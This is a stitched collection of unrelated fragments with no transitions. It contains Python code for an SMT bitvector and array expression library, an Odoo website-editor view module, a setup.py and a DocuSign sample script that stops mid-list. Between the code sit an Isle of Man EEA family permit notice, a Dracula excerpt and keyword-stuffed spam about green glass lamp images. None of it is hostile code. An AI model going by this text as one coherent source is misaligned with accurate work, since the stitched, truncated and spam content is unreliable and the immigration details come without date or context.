    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    @property
    def declaration(self):
        return f"(declare-fun {self.name} () (_ BitVec {self.size}))"


class BitVecConstant(BitVec, Constant):
    def __init__(self, size: int, value: int, *args, **kwargs):
        super().__init__(size, value, *args, **kwargs)

    def __bool__(self):
        return self.value != 0

    def __eq__(self, other):
        # Tainted constants keep symbolic equality so taint propagates;
        # untainted constants compare concretely.
        if self.taint:
            return super().__eq__(other)
        return self.value == other

    def __hash__(self):
        return super().__hash__()


class BitVecOperation(BitVec, Operation):
    def __init__(self, size, *operands, **kwargs):
        super().__init__(size, *operands, **kwargs)


# The following operation nodes all take their result width from operand `a`.
class BitVecAdd(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecSub(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecMul(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecDiv(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecUnsignedDiv(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecMod(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecRem(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecUnsignedRem(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecShiftLeft(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecShiftRight(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecArithmeticShiftLeft(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecArithmeticShiftRight(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecAnd(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecOr(BitVecOperation):
    def __init__(self, a: BitVec, b: BitVec, *args, **kwargs):
        assert a.size == b.size
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecXor(BitVecOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a.size, a, b, *args, **kwargs)


class BitVecNot(BitVecOperation):
    def __init__(self, a, **kwargs):
        super().__init__(a.size, a, **kwargs)


class BitVecNeg(BitVecOperation):
    def __init__(self, a, *args, **kwargs):
        super().__init__(a.size, a, *args, **kwargs)


# Comparing two bitvectors results in a Bool
class LessThan(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a, b, *args, **kwargs)


class LessOrEqual(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a, b, *args, **kwargs)


class BoolEqual(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        # Width check only applies when comparing bitvectors (Bool == Bool is
        # also routed here via Bool.__eq__).
        if isinstance(a, BitVec) or isinstance(b, BitVec):
            assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)


class GreaterThan(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)


class GreaterOrEqual(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)


class UnsignedLessThan(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        super().__init__(a, b, *args, **kwargs)
        # NOTE(review): the width assert runs after construction here, unlike
        # the sibling comparison classes which assert first.
        assert a.size == b.size


class UnsignedLessOrEqual(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)


class UnsignedGreaterThan(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)


class UnsignedGreaterOrEqual(BoolOperation):
    def __init__(self, a, b, *args, **kwargs):
        assert a.size == b.size
        super(UnsignedGreaterOrEqual, self).__init__(a, b, *args, **kwargs)


###############################################################################
# Array  BV32 -> BV8  or  BV64 -> BV8
class Array(Expression):
    """Abstract SMT array mapping BitVec indices to BitVec values."""

    def __init__(
        self, index_bits: int, index_max: Optional[int], value_bits: int, *operands, **kwargs
    ):
        assert index_bits in (32, 64, 256)
        assert value_bits in (8, 16, 32, 64, 256)
        assert index_max is None or index_max >= 0 and index_max < 2 ** index_bits
        self._index_bits = index_bits
        self._index_max = index_max
        self._value_bits = value_bits
        super().__init__(*operands, **kwargs)
        assert type(self) is not Array, "Abstract class"

    def _get_size(self, index):
        # Concrete length of a slice; symbolic sizes must simplify to a constant.
        start, stop = self._fix_index(index)
        size = stop - start
        if isinstance(size, BitVec):
            from .visitors import simplify

            size = simplify(size)
        else:
            size = BitVecConstant(self.index_bits, size)
        assert isinstance(size, BitVecConstant)
        return size.value

    def _fix_index(self, index):
        """
        Normalize a slice's (start, stop), defaulting to (0, len(self)).

        :param slice index:
        """
        stop, start = index.stop, index.start
        if start is None:
            start = 0
        if stop is None:
            stop = len(self)
        return start, stop

    def cast(self, possible_array):
        # Only concrete bytearrays are currently promotable to Array.
        if isinstance(possible_array, bytearray):
            # FIXME This should be related to a constrainSet
            arr = ArrayVariable(self.index_bits, len(possible_array), 8)
            for pos, byte in enumerate(possible_array):
                arr = arr.store(pos, byte)
            return arr
        raise ValueError  # cast not implemented

    def cast_index(self, index: Union[int, "BitVec"]) -> Union["BitVecConstant", "BitVec"]:
        if isinstance(index, int):
            # assert self.index_max is None or index >= 0 and index < self.index_max
            return BitVecConstant(self.index_bits, index)
        assert index.size == self.index_bits
        return index

    def cast_value(
        self, value: Union["BitVec", str, bytes, int]
    ) -> Union["BitVecConstant", "BitVec"]:
        if isinstance(value, BitVec):
            assert value.size == self.value_bits
            return value
        if isinstance(value, (str, bytes)) and len(value) == 1:
            value = ord(value)
        if not isinstance(value, int):
            value = int(value)
        return BitVecConstant(self.value_bits, value)

    def __len__(self):
        if self.index_max is None:
            raise ExpressionException("Array max index not set")
        return self.index_max

    @property
    def index_bits(self):
        return self._index_bits

    @property
    def value_bits(self):
        return self._value_bits

    @property
    def index_max(self):
        return self._index_max

    def select(self, index):
        index = self.cast_index(index)
        return ArraySelect(self, index)

    def store(self, index, value):
        # Functional store: returns a new ArrayStore node.
        return ArrayStore(self, self.cast_index(index), self.cast_value(value))

    def write(self, offset, buf):
        """Functionally write `buf` (Array or bytearray) at `offset`."""
        if not isinstance(buf, (Array, bytearray)):
            raise TypeError("Array or bytearray expected got {:s}".format(type(buf)))
        arr = self
        for i, val in enumerate(buf):
            arr = arr.store(offset + i, val)
        return arr

    def read(self, offset, size):
        return ArraySlice(self, offset, size)

    def __getitem__(self, index):
        if isinstance(index, slice):
            start, stop = self._fix_index(index)
            size = self._get_size(index)
            return ArraySlice(self, start, size)
        else:
            if self.index_max is not None:
                if not isinstance(index, Expression) and index >= self.index_max:
                    raise IndexError
            return self.select(self.cast_index(index))

    def __eq__(self, other):
        # FIXME taint
        def compare_buffers(a, b):
            if len(a) != len(b):
                return BoolConstant(False)
            cond = BoolConstant(True)
            for i in range(len(a)):
                cond = BoolAnd(cond.cast(a[i] == b[i]), cond)
                # NOTE(review): `is` compares identity against a freshly built
                # BoolConstant, so this early-exit can never trigger — likely
                # intended as a value check.
                if cond is BoolConstant(False):
                    return BoolConstant(False)
            return cond

        return compare_buffers(self, other)

    def __ne__(self, other):
        return BoolNot(self == other)

    def __hash__(self):
        return super().__hash__()

    @property
    def underlying_variable(self):
        # Walk through the chain of stores down to the base ArrayVariable.
        array = self
        while not isinstance(array, ArrayVariable):
            array = array.array
        return array

    def read_BE(self, address, size):
        # NOTE(review): unlike read_LE/write_BE, `address` is not passed
        # through cast_index here — confirm callers always pass a BitVec/int
        # that `+` handles correctly.
        bytes = []
        for offset in range(size):
            bytes.append(self.get(address + offset, 0))
        return BitVecConcat(size * self.value_bits, *bytes)

    def read_LE(self, address, size):
        address = self.cast_index(address)
        bytes = []
        for offset in range(size):
            bytes.append(self.get(address + offset, 0))
        return BitVecConcat(size * self.value_bits, *reversed(bytes))

    def write_BE(self, address, value, size):
        address = self.cast_index(address)
        value = BitVec(size * self.value_bits).cast(value)
        array = self
        for offset in range(size):
            array = array.store(
                address + offset,
                BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits),
            )
        return array

    def write_LE(self, address, value, size):
        address = self.cast_index(address)
        value = BitVec(size * self.value_bits).cast(value)
        array = self
        for offset in reversed(range(size)):
            array = array.store(
                address + offset,
                BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits),
            )
        return array

    def __add__(self, other):
        """Concatenate self ++ other into a fresh, fully-stored ArrayProxy."""
        if not isinstance(other, (Array, bytearray)):
            raise TypeError("can't concat Array to {}".format(type(other)))
        if isinstance(other, Array):
            if self.index_bits != other.index_bits or self.value_bits != other.value_bits:
                raise ValueError("Array sizes do not match for concatenation")

        from .visitors import simplify

        # FIXME This should be related to a constrainSet
        new_arr = ArrayProxy(
            ArrayVariable(
                self.index_bits,
                self.index_max + len(other),
                self.value_bits,
                "concatenation{}".format(uuid.uuid1()),
            )
        )
        for index in range(self.index_max):
            new_arr[index] = simplify(self[index])
        for index in range(len(other)):
            new_arr[index + self.index_max] = simplify(other[index])
        return new_arr

    def __radd__(self, other):
        """Concatenate other ++ self (other is the left operand)."""
        if not isinstance(other, (Array, bytearray, bytes)):
            raise TypeError("can't concat Array to {}".format(type(other)))
        if isinstance(other, Array):
            if self.index_bits != other.index_bits or self.value_bits != other.value_bits:
                raise ValueError("Array sizes do not match for concatenation")

        from .visitors import simplify

        # FIXME This should be related to a constrainSet
        new_arr = ArrayProxy(
            ArrayVariable(
                self.index_bits,
                self.index_max + len(other),
                self.value_bits,
                "concatenation{}".format(uuid.uuid1()),
            )
        )
        for index in range(len(other)):
            new_arr[index] = simplify(other[index])
        _concrete_cache = new_arr._concrete_cache
        for index in range(self.index_max):
            new_arr[index + len(other)] = simplify(self[index])
        new_arr._concrete_cache.update(_concrete_cache)
        return new_arr


class ArrayVariable(Array, Variable):
    def __init__(self, index_bits, index_max, value_bits, name, *operands, **kwargs):
        # `name` is threaded through Array.__init__'s *operands to Variable.
        super().__init__(index_bits, index_max, value_bits, name, **kwargs)

    @property
    def declaration(self):
        return f"(declare-fun {self.name} () (Array (_ BitVec {self.index_bits}) (_ BitVec {self.value_bits})))"


class ArrayOperation(Array, Operation):
    def __init__(self, array: Array, *operands, **kwargs):
        super().__init__(
            array.index_bits, array.index_max, array.value_bits, array, *operands, **kwargs
        )


class ArrayStore(ArrayOperation):
    """Functional store node: operands are (array, index, value)."""

    def __init__(self, array: "Array", index: "BitVec", value: "BitVec", *args, **kwargs):
        assert index.size == array.index_bits
        assert value.size == array.value_bits
        super().__init__(array, index, value, *args, **kwargs)

    @property
    def array(self):
        return self.operands[0]

    @property
    def name(self):
        return self.operands[0].name

    @property
    def index(self):
        return self.operands[1]

    @property
    def value(self):
        return self.operands[2]


class ArraySlice(Array):
    """A size-limited, offset view over another Array (not an Operation node)."""

    def __init__(
        self, array: Union["Array", "ArrayProxy"], offset: int, size: int, *args, **kwargs
    ):
        if not isinstance(array, Array):
            raise ValueError("Array expected")
        if isinstance(array, ArrayProxy):
            array = array._array
        super().__init__(array.index_bits, array.index_max, array.value_bits, *args, **kwargs)

        self._array = array
        self._slice_offset = offset
        self._slice_size = size

    @property
    def underlying_variable(self):
        return self._array.underlying_variable

    @property
    def operands(self):
        return self._array.operands

    @property
    def index_bits(self):
        return self._array.index_bits

    @property
    def index_max(self):
        # A slice's logical length is its size, not the backing array's.
        return self._slice_size

    @property
    def value_bits(self):
        return self._array.value_bits

    @property
    def taint(self):
        return self._array.taint

    def select(self, index):
        # Translate slice-relative index to backing-array index.
        return self._array.select(index + self._slice_offset)

    def store(self, index, value):
        return ArraySlice(
            self._array.store(index + self._slice_offset, value),
            self._slice_offset,
            self._slice_size,
        )


class ArrayProxy(Array):
    """Mutable-feeling wrapper over a functional Array.

    Keeps a concrete-index write cache and a `written` index set so symbolic
    reads can fall back to a default value for never-written cells.
    """

    def __init__(self, array: Array, default: Optional[int] = None):
        self._default = default
        self._concrete_cache: Dict[int, int] = {}
        self._written = None
        if isinstance(array, ArrayProxy):
            # copy constructor
            super().__init__(array.index_bits, array.index_max, array.value_bits)
            self._array: Array = array._array
            self._name: str = array._name
            if default is None:
                self._default = array._default
            self._concrete_cache = dict(array._concrete_cache)
            self._written = set(array.written)
        elif isinstance(array, ArrayVariable):
            # fresh array proxy
            super().__init__(array.index_bits, array.index_max, array.value_bits)
            self._array = array
            self._name = array.name
        else:
            # arrayproxy for a prepopulated array
            super().__init__(array.index_bits, array.index_max, array.value_bits)
            self._name = array.underlying_variable.name
            self._array = array

    @property
    def underlying_variable(self):
        return self._array.underlying_variable

    @property
    def array(self):
        return self._array

    @property
    def name(self):
        return self._name

    @property
    def operands(self):
        return self._array.operands

    @property
    def index_bits(self):
        return self._array.index_bits

    @property
    def index_max(self):
        return self._array.index_max

    @property
    def value_bits(self):
        return self._array.value_bits

    @property
    def taint(self):
        return self._array.taint

    def select(self, index):
        return self.get(index)

    def store(self, index, value):
        if not isinstance(index, Expression):
            index = self.cast_index(index)
        if not isinstance(value, Expression):
            value = self.cast_value(value)
        from .visitors import simplify

        index = simplify(index)
        if isinstance(index, Constant):
            self._concrete_cache[index.value] = value
        else:
            # delete all cache as we do not know what this may overwrite.
            self._concrete_cache = {}
        # potentially generate and update .written set
        self.written.add(index)
        self._array = self._array.store(index, value)
        return self

    def __getitem__(self, index):
        if isinstance(index, slice):
            start, stop = self._fix_index(index)
            size = self._get_size(index)
            array_proxy_slice = ArrayProxy(ArraySlice(self, start, size), default=self._default)
            array_proxy_slice._concrete_cache = {}
            # Re-base concrete cache and written set to slice-relative indices.
            for k, v in self._concrete_cache.items():
                if k >= start and k < start + size:
                    array_proxy_slice._concrete_cache[k - start] = v

            for i in self.written:
                array_proxy_slice.written.add(i - start)
            return array_proxy_slice
        else:
            if self.index_max is not None:
                if not isinstance(index, Expression) and index >= self.index_max:
                    raise IndexError
            return self.get(index, self._default)

    def __setitem__(self, index, value):
        if isinstance(index, slice):
            start, stop = self._fix_index(index)
            size = self._get_size(index)
            assert len(value) == size
            for i in range(size):
                self.store(start + i, value[i])
        else:
            self.store(index, value)

    def __getstate__(self):
        # Custom pickling: the proxy is fully described by these five fields.
        state = {}
        state["_default"] = self._default
        state["_array"] = self._array
        state["name"] = self.name
        state["_concrete_cache"] = self._concrete_cache
        state["_written"] = self._written
        return state

    def __setstate__(self, state):
        self._default = state["_default"]
        self._array = state["_array"]
        self._name = state["name"]
        self._concrete_cache = state["_concrete_cache"]
        self._written = state["_written"]

    def __copy__(self):
        return ArrayProxy(self)

    @property
    def written(self):
        # Calculate only first time
        if self._written is None:
            written = set()
            # unwrap the proxied array
            array = self._array
            offset = 0
            while isinstance(array, ArraySlice):
                # if it is a proxy over a slice take out the slice too
                offset += array._slice_offset
                array = array._array
            while not isinstance(array, ArrayVariable):
                # Indices written to the underlying Array are displaced when sliced
                written.add(array.index - offset)
                array = array.array
            assert isinstance(array, ArrayVariable)
            self._written = written
        return self._written

    def is_known(self, index):
        """Symbolic predicate: has `index` ever been written?"""
        if isinstance(index, Constant) and index.value in self._concrete_cache:
            return BoolConstant(True)

        is_known_index = BoolConstant(False)
        written = self.written
        for known_index in written:
            if isinstance(index, Constant) and isinstance(known_index, Constant):
                if known_index.value == index.value:
                    return BoolConstant(True)
            is_known_index = BoolOr(is_known_index.cast(index == known_index), is_known_index)
        return is_known_index

    def get(self, index, default=None):
        if default is None:
            default = self._default
        index = self.cast_index(index)

        if self.index_max is not None:
            from .visitors import simplify

            # Wrap negative indices Python-style: idx < 0 -> index_max + idx + 1.
            index = simplify(
                BitVecITE(self.index_bits, index < 0, self.index_max + index + 1, index)
            )
        if isinstance(index, Constant) and index.value in self._concrete_cache:
            return self._concrete_cache[index.value]

        value = self._array.select(index)
        if default is None:
            return value

        # Read with fallback: ITE(was-written, stored-value, default).
        is_known = self.is_known(index)
        default = self.cast_value(default)
        return BitVecITE(self._array.value_bits, is_known, value, default)


class ArraySelect(BitVec, Operation):
    """Read node: operands are (array, index); result width is value_bits."""

    def __init__(self, array: "Array", index: "BitVec", *args, **kwargs):
        assert index.size == array.index_bits
        super().__init__(array.value_bits, array, index, *args, **kwargs)

    @property
    def array(self):
        return self.operands[0]

    @property
    def index(self):
        return self.operands[1]

    def __repr__(self):
        return f"<ArraySelect obj with index={self.index}:\n{self.array}>"


class BitVecSignExtend(BitVecOperation):
    def __init__(self, operand: "BitVec", size_dest: int, *args, **kwargs):
        assert size_dest >= operand.size
        super().__init__(size_dest, operand, *args, **kwargs)
        self.extend = size_dest - operand.size


class BitVecZeroExtend(BitVecOperation):
    # NOTE(review): parameter order (size_dest, operand) is the reverse of
    # BitVecSignExtend's (operand, size_dest).
    def __init__(self, size_dest: int, operand: "BitVec", *args, **kwargs):
        assert size_dest >= operand.size
        super().__init__(size_dest, operand, *args, **kwargs)
        self.extend = size_dest - operand.size


class BitVecExtract(BitVecOperation):
    """Extract `size` bits of `operand` starting at bit `offset` (inclusive)."""

    def __init__(self, operand: "BitVec", offset: int, size: int, *args, **kwargs):
        assert offset >= 0 and offset + size <= operand.size
        super().__init__(size, operand, *args, **kwargs)
        self._begining = offset
        self._end = offset + size - 1

    @property
    def value(self):
        return self.operands[0]

    @property
    def begining(self):
        return self._begining

    @property
    def end(self):
        return self._end


class BitVecConcat(BitVecOperation):
    def __init__(self, size_dest: int, *operands, **kwargs):
        assert all(isinstance(x, BitVec) for x in operands)
        assert size_dest == sum(x.size for x in operands)
        super().__init__(size_dest, *operands, **kwargs)


class BitVecITE(BitVecOperation):
    """If-then-else over bitvectors: operands are (condition, true, false)."""

    def __init__(
        self,
        size: int,
        condition: Union["Bool", bool],
        true_value: "BitVec",
        false_value: "BitVec",
        *args,
        **kwargs,
    ):
        assert true_value.size == size
        assert false_value.size == size
        super().__init__(size, condition, true_value, false_value, *args, **kwargs)
A family permit is a type of entry clearance issued to direct and extended family members of an EEA National who are in, or intend to come to, the Isle of Man to exercise free movement rights. An EEA family permit makes it easier and quicker to enter the UK. Without one you might not get a boarding pass and could experience major delays, and you may be refused entry into the UK. Direct and extended family members of an EEA National may apply for a family permit; the application fee is currently £65. For more information about the rights of EEA citizens and their families to come to live and work in the Isle of Man, please refer to the Isle of Man Immigration Rules and the Immigration (European Economic Area) Regulations 2009, as amended. You must be outside the UK and Isle of Man to apply for an EEA family permit. An EEA family permit is valid for 6 months, and you can leave and enter the Isle of Man and UK as many times as you need within that time. Once you have arrived in the Isle of Man, an application must be made to extend your permit to 5 years.
# -*- coding: utf-8 -*-
# Website-editor extension of `ir.ui.view`: restricts "editable" rendering to
# users with write access, and saves HTML sections edited in the frontend back
# into view archs and into the records embedded in them (data-oe-* markup).
import copy

import openerp
from openerp.exceptions import AccessError
from openerp.osv import osv
from lxml import etree, html

from openerp import api


class view(osv.osv):
    _inherit = 'ir.ui.view'

    @api.cr_uid_ids_context
    def render(self, cr, uid, id_or_xml_id, values=None, engine='ir.qweb', context=None):
        """Render the view, downgrading ``values['editable']`` to ``False``
        when the current user lacks write access on the view.

        ``id_or_xml_id`` may be a database id or a fully-qualified xml id
        ("module.template"); the latter is resolved before the access check.
        """
        if not values:
            values = {}
        if values.get('editable'):
            try:
                # NOTE: `long` — this module targets Python 2.
                if not isinstance(id_or_xml_id, (int, long)):
                    if '.' not in id_or_xml_id:
                        raise ValueError('Invalid template id: %r' % (id_or_xml_id,))
                    id_or_xml_id = self.get_view_id(cr, uid, id_or_xml_id, context=context)
                self.check_access_rule(cr, uid, [id_or_xml_id], 'write', context=context)
            except AccessError:
                values['editable'] = False

        return super(view, self).render(cr, uid, id_or_xml_id, values=values, engine=engine, context=context)

    #------------------------------------------------------
    # Save from html
    #------------------------------------------------------
    def extract_embedded_fields(self, cr, uid, arch, context=None):
        """Return all elements of ``arch`` bound to a model other than
        ``ir.ui.view`` (i.e. embedded record fields to write back)."""
        return arch.xpath('//*[@data-oe-model != "ir.ui.view"]')

    def save_embedded_field(self, cr, uid, el, context=None):
        """Write the value of one embedded-field element ``el`` back to its
        record, using the qweb converter matching its ``data-oe-type``."""
        Model = self.pool[el.get('data-oe-model')]
        field = el.get('data-oe-field')

        converter = self.pool['ir.qweb'].get_converter_for(el.get('data-oe-type'))
        value = converter.from_html(cr, uid, Model, Model._fields[field], el)

        # `None` means the converter extracted nothing to persist.
        if value is not None:
            # TODO: batch writes?
            Model.write(cr, uid, [int(el.get('data-oe-id'))], {
                field: value
            }, context=context)

    def _pretty_arch(self, arch):
        """Return ``arch`` serialized as pretty-printed unicode XML."""
        # remove_blank_string does not seem to work on HTMLParser, and
        # pretty-printing with lxml more or less requires stripping
        # whitespace: http://lxml.de/FAQ.html#why-doesn-t-the-pretty-print-option-reformat-my-xml-output
        # so serialize to XML, parse as XML (remove whitespace) then serialize
        # as XML (pretty print)
        arch_no_whitespace = etree.fromstring(
            etree.tostring(arch, encoding='utf-8'),
            parser=etree.XMLParser(encoding='utf-8', remove_blank_text=True))
        return etree.tostring(
            arch_no_whitespace, encoding='unicode', pretty_print=True)

    def replace_arch_section(self, cr, uid, view_id, section_xpath, replacement, context=None):
        """Replace the content (text, tail and children) of the arch node
        matched by ``section_xpath`` — or the whole arch when no xpath is
        given — with the content of ``replacement``; return the new arch.
        """
        # the root of the arch section shouldn't actually be replaced as it's
        # not really editable itself, only the content truly is editable.
        [view] = self.browse(cr, uid, [view_id], context=context)
        arch = etree.fromstring(view.arch.encode('utf-8'))
        # => get the replacement root
        if not section_xpath:
            root = arch
        else:
            # ensure there's only one match
            [root] = arch.xpath(section_xpath)

        root.text = replacement.text
        root.tail = replacement.tail
        # replace all children
        del root[:]
        for child in replacement:
            root.append(copy.deepcopy(child))

        return arch

    def to_field_ref(self, cr, uid, el, context=None):
        """Convert an edited embedded-field element back into a ``t-field``
        node, dropping the editor's ``data-oe-*`` metadata attributes."""
        # filter out meta-information inserted in the document
        attributes = dict((k, v) for k, v in el.items()
                          if not k.startswith('data-oe-'))
        attributes['t-field'] = el.get('data-oe-expression')

        out = html.html_parser.makeelement(el.tag, attrib=attributes)
        out.tail = el.tail
        return out

    def save(self, cr, uid, res_id, value, xpath=None, context=None):
        """ Update a view section. The view section may embed fields to write

        :param str model:
        :param int res_id:
        :param str xpath: valid xpath to the tag to replace
        """
        res_id = int(res_id)

        arch_section = html.fromstring(
            value, parser=html.HTMLParser(encoding='utf-8'))

        if xpath is None:
            # value is an embedded field on its own, not a view section
            self.save_embedded_field(cr, uid, arch_section, context=context)
            return

        # Persist each embedded field, then turn it back into a t-field node
        # so the stored arch stays a template rather than rendered content.
        for el in self.extract_embedded_fields(cr, uid, arch_section, context=context):
            self.save_embedded_field(cr, uid, el, context=context)

            # transform embedded field back to t-field
            el.getparent().replace(el, self.to_field_ref(cr, uid, el, context=context))

        arch = self.replace_arch_section(cr, uid, res_id, xpath, arch_section, context=context)
        self.write(cr, uid, res_id, {
            'arch': self._pretty_arch(arch)
        }, context=context)

        # Mark the view noupdate so module upgrades don't overwrite the edit.
        view = self.browse(cr, openerp.SUPERUSER_ID, res_id, context=context)
        if view.model_data_id:
            view.model_data_id.write({'noupdate': True})
Another surprise. Mina woke me early, about the same time as yesterday, and asked me to bring Dr. Van Helsing. I thought that it was another occassion for hypnotism, and without question went for the Professor. He had evidently expected some such call, for I found him dressed in his room. His door was ajar, so that he could hear the opening of the door of our room. He came at once. As he passed into the room, he asked Mina if the others might come, too. “But why, dear Madam Mina? You know that your safety is our solemnest duty. We go into danger, to which you are, or may be, more liable than any of us from . . . from circumstances . . . things that have been.” He paused embarrassed. As she replied, she raised her finger and pointed to her forehead. “I know. That is why I must go. I can tell you now, whilst the sun is coming up. I may not be able again. I know that when the Count wills me I must go. I know that if he tells me to come in secret, I must by wile. By any device to hoodwink, even Jonathan.” God saw the look that she turned on me as she spoke, and if there be indeed a Recording Angel that look is noted to her ever-lasting honor. I could only clasp her hand. I could not speak. My emotion was too great for even the relief of tears. When he had spoken, Mina’s long spell of silence made me look at her. She had fallen back on her pillow asleep. She did not even wake when I had pulled up the blind and let in the sunlight which flooded the room. Van Helsing motioned to me to come with him quietly. We went to his room, and within a minute Lord Godalming, Dr. Seward, and Mr. Morris were with us also. “What shall we do exactly?”asked Mr. Morris laconically. “I shall not wait for any opportunity,” said Morris. “When I see the box I shall open it and destroy the monster, though there were a thousand men looking on, and if I am to be wiped out for it the next moment!” I grasped his hand instinctively and found it as firm as a piece of steel. 
I think he understood my look. I hope he did. There was nothing further to be said, and we parted. I shall now settle up all my affairs of earth, and be ready for whatever may come. Later.–It is done. My will is made, and all complete. Mina if she survive is my sole heir. If it should not be so, then the others who have been so good to us shall have remainder. It is now drawing towards the sunset. Mina’s uneasiness calls my attention to it. I am sure that there is something on her mind which the time of exact sunset will reveal. These occasions are becoming harrowing times for us all. For each sunrise and sunset opens up some new danger, some new pain, which however, may in God’s will be means to a good end. I write all these things in the diary since my darling must not hear them now. But if it may be that she can see them again, they shall be ready. She is calling to me.
from distutils.core import setup
import os

# Directory containing this setup.py; used to locate README.rst reliably
# regardless of the current working directory.
here_dir = os.path.abspath(os.path.dirname(__file__))


def readme():
    """Return the contents of README.rst, used as the PyPI long description."""
    with open(os.path.join(here_dir, 'README.rst')) as f:
        return f.read()


setup(
    name='bond',
    packages=['bond', 'bond.bond_helpers'],
    version='1.1.0',
    description='Testing with Spies and Mocks',
    long_description=readme(),
    # NOTE: a previous `summary=` keyword was removed here — it is not a valid
    # distutils/setuptools option (it only produced an "Unknown distribution
    # option: 'summary'" warning); `description` already carries that text.
    author='George Necula, Erik Krogen',
    author_email='necula@cs.berkeley.edu',
    url='http://necula01.github.io/bond/',
    license='BSD',
    keywords=['testing', 'mocking'],
    package_dir={
        'bond': 'bond'
    },
    package_data={
        'bond': ['AUTHORS.rst', 'LICENSE', 'README.rst']
    },
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Natural Language :: English",
        "License :: OSI Approved :: BSD License",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
        "Topic :: Software Development :: Libraries :: Python Modules",
        'Topic :: Software Development :: Testing'
    ]
)
Image Title: Titan Lighting 30 In Seafoam Green Glass Bottle Table Lamp TN Throughout Decor 0. Post Title: Green Glass Lamp. Filename: titan-lighting-30-in-seafoam-green-glass-bottle-table-lamp-tn-throughout-decor-0.jpg. Image Dimension: 1000 x 1000 pixels. Images Format: jpg/jpeg. Publisher/Author: Moses Wolff. Uploaded Date: Saturday - September 29th. 2018 20:19:08 PM. Category: Architecture. Image Source: homedit.com. Why You Should Have Green Lamp Shades For Table Lamps Lighting And Regarding Glass Designs 15. Fall Shopping Special Rita Blue Green Glass Accent Table Lamp Regarding Plan 3. Pair Of Large Emerald Green Glass Teardrop Lamps On Perspex Bases With Lamp Ideas 9. David Hunt Lighting Azores Single Light Large Table Lamp Base Only Regarding Green Glass Decor 1. Green Glass Teardrop Halsey Table Lamp Base World Market In Prepare 2. Green Glass Lamp Etsy With Regard To Prepare 14. Vintage Deco Jadeite Green Slag Glass Lamp Bread Butter Antiques Within Designs 12. Clift Glass Table Lamp Base Green Pottery Barn For Remodel 5. Marbro Lamp Company Pair Of Impressive Green Murano Glass Lamps With Regard To Prepare 16. Light Accents Bankers Lamp Desk With Green Glass Shade And Inside Designs 11.
#!/usr/bin/env python
# coding=utf-8
"""Sample script that demonstrates `pydocusign` usage for embedded signing.

See also http://iodocs.docusign.com/APIWalkthrough/embeddedSigning

"""
from __future__ import print_function
import hashlib
import os
import uuid

import pydocusign
from pydocusign.test import fixtures_dir

# Python 2/3 compatibility shim: on Python 3, `raw_input` does not exist,
# so alias it to `input`.
try:
    raw_input
except NameError:
    raw_input = input


def prompt(environ_key, description, default):
    """Return a configuration value.

    The value is read from environment variable ``environ_key`` when set;
    otherwise the user is prompted interactively, with ``default`` used for
    an empty answer.
    """
    try:
        return os.environ[environ_key]
    except KeyError:
        value = raw_input('{description} (default: "{default}"): '.format(
            default=default,
            description=description))
        if not value:
            return default
        else:
            return value


# Get configuration from environment or prompt the user...
root_url = prompt(
    'DOCUSIGN_ROOT_URL',
    'DocuSign API URL',
    'https://demo.docusign.net/restapi/v2')
username = prompt(
    'DOCUSIGN_USERNAME',
    'DocuSign API username',
    '')
password = prompt(
    'DOCUSIGN_PASSWORD',
    'DocuSign API password',
    '')
integrator_key = prompt(
    'DOCUSIGN_INTEGRATOR_KEY',
    'DocuSign API integrator key',
    '')
callback_url = prompt(
    'DOCUSIGN_TEST_CALLBACK_URL',
    'Envelope callback URL',
    '')
signer_return_url = prompt(
    'DOCUSIGN_TEST_SIGNER_RETURN_URL',
    'Signer return URL',
    '')


# Create a client.
client = pydocusign.DocuSignClient(
    root_url=root_url,
    username=username,
    password=password,
    integrator_key=integrator_key,
)


# Login. Updates API URLs in client.
print("1. GET /login_information")
login_information = client.login_information()
print("   Received data: {data}".format(data=login_information))


# Prepare list of signers. Ordering matters.
signers = [
